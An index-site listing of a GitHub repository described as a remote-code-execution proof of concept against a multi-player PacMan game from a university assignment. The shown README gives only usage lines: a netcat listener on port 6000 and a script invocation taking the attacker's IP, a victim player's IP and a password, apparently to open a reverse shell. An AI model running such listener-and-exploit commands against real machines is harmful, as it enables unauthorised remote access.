An open API service indexing awesome lists of open source software.

https://github.com/oelin/rcepm

RCE exploit PoC for multi-player PacMan.
https://github.com/oelin/rcepm

exploit pacman poc proof-of-concept rce remote-code-execution

Last synced: 3 days ago
JSON representation

RCE exploit PoC for multi-player PacMan.

Awesome Lists containing this project

README

          

# rcepm

RCE exploit PoC for [multi-player PacMan](https://github.com/mhandley/ENGF2-2022/tree/master/assignments/assignment5).

## Usage

```sh
$ nc -lv 6000
```

```sh
$ python3 rce.py [your ip] [player ip] [password]'
```